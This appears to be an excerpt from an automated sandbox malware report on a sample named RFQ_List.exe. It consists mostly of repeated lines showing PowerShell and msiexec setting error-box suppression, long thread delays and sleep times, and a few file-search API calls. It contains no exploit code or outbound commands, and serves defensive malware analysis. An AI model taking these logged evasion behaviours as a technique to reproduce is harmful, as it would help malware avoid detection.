        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599866Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599745Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599610Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599485Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599360Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599235Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599110Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598997Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598875Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598766Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598641Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598532Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598407Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598282Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598063Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597938Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597813Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597688Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597563Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597453Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597344Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597218Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597000Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596782Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596657Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596532Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596407Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596297Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596188Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596063Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595938Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595813Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595688Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595579Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595454Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595329Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595216Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7069Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2624Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5472Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -24903104499507879s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 7132Thread sleep count: 1597 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599866s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 7132Thread sleep count: 8224 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599745s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599610s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599485s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599360s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599235s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -599110s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598997s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598875s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598766s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598641s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598532s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598407s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598282s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598172s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -598063s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597938s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597813s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597688s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597563s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597453s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597344s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597218s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597109s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -597000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596891s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596782s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596657s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596532s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596407s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596297s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596188s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -596063s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595938s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595813s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595688s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595579s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595454s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595329s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595216s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -595094s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594969s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594860s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594735s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594610s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594485s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594360s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594235s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exe TID: 3848Thread sleep time: -594110s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
        Source: C:\Users\user\Desktop\RFQ_List.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
